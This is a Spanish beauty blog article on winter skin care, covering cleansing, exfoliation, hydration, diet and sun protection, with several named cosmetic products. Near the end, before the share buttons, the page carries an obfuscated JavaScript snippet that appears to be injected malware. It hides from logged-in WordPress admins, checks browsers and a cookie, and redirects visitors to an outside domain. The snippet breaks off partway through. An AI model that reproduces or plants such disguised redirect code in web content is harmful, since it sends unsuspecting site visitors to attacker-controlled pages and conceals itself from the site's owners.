Prepara tu piel para el invierno

¿Crees que lucir un rostro bonito e hidratado en esta época del año no es posible? Te equivocas.  Lo es siempre y cuando lo cuides con especial mimo. En los meses más fríos del año, la piel sufre más que nunca debido a las bajas temperaturas, a las heladas que se producen y al aire frío con el que muchas veces convivimos. Estos factores meteorológicos son los principales causantes de una tez sin luz, seca, tirante e incluso con algunas rojeces en las zonas más sensibles del rostro, como las mejillas. Sin embargo, está en tus manos prevenir estos efectos preparándola para el invierno. ¿Quieres saber cómo hacerlo?

como-cuidar-la-piel-en-invierno

Limpieza en profundidad
Con la llegada de los meses fríos no hay que bajar la guardia en cuanto a limpieza y cuidados. Por eso, cada noche debes lavarte la cara en profundidad con una buena leche limpiadora y aplicar después el tónico, para retirar cualquier resto de suciedad. Pero también debes incluir en tu ritual de belleza una limpieza más profunda: la exfoliación. Verás cómo tu tez te pide un peeling semanal a gritos en esta época del año. El Silky Purifing de Sensai elimina espinillas y células muertas (en invierno solemos tener más) y le devuelve a la piel la luminosidad y suavidad que había perdido. Complementa este momento con una buena máscara hidratante que le devolverá a la tez la hidratación necesaria.

cuidados-de-la-piel-en-invierno

El Gel Express aux Fleurs de Sisley es una mascarilla-gel muy fresca que es un gustazo de aplicar gracias a su textura. Pero lo mejor de todo es que tiene una concentración muy alta de activos hidratantes para penetrar en la piel y eliminar las señales de cansancio, estrés y sequedad que pueda tener. ¡Justo lo que estabas buscando!

Cuidarnos por fuera y por dentro

La alimentación es otro de los puntos clave a la hora de preparar la piel para el invierno. Si en verano hay que beber mucha agua, ahora también. ¿Eres de los que le cuesta beber agua cuando hace frío? No te preocupes porque hay otras formas de hacerlo. Sopas, tés e infusiones serán tus grandes aliados pero también es conveniente aumentar la ingesta de frutas y verduras que tienen una alta cantidad de agua para el organismo. Y como es clave hidratar desde lo más profundo, tendrás que usar productos que refuercen la hidratación y donde a veces una crema no es suficiente: el Double Serum de Clarins hace esa función gracias a sus activos concentrados, además de alisar y minimizar los poros.

prepara-tu-piel-para-el-invierno

También conviene usar protección porque aunque no haga calor, el sol sigue emitiendo sus rayos y la piel sigue expuesta a ellos. Por último, hay que reforzar aquellas zonas que han sufrido especialmente restaurándolas y devolviéndoles la calma. Es la magia de Advanced Night Repair de Estée Lauder, unas ampollas intensivas restauradoras que disminuyen la irritación que haya podido sufrir la piel por culpa de los daños medioambientales. Su eficacia es muy alta, ya que con una sola ampolla, sentirás la piel más relajada.

¿Cómo preparas la piel para afrontar el frío del invierno?

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone